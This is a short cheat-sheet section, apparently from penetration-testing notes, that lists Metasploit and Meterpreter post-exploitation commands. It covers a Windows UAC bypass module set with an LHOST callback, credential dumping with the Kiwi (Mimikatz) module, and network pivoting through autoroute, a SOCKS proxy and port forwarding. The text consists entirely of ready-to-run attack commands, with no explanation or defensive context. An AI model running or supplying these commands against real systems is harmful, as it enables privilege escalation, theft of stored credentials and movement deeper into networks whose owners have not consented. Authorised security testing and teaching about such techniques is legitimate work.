6. Post-Exploitation Modules


UAC bypass:

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
use exploit/windows/local/bypassuac_sdclt
set session <id>
set LHOST <localhost>
run

Kiwi Credential Stealer:

#Load module:
load kiwi

#Dump LM/NTLM creds:
creds_msv

#Dump all creds:
creds_all

Meterpreter Port Forwarding:

route add <ip-or-range> <msfsessionid>
route flush
use multi/manage/autoroute
set session <id>
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j
portfwd add -l <localport> -p <remoteport> -r <remoteip>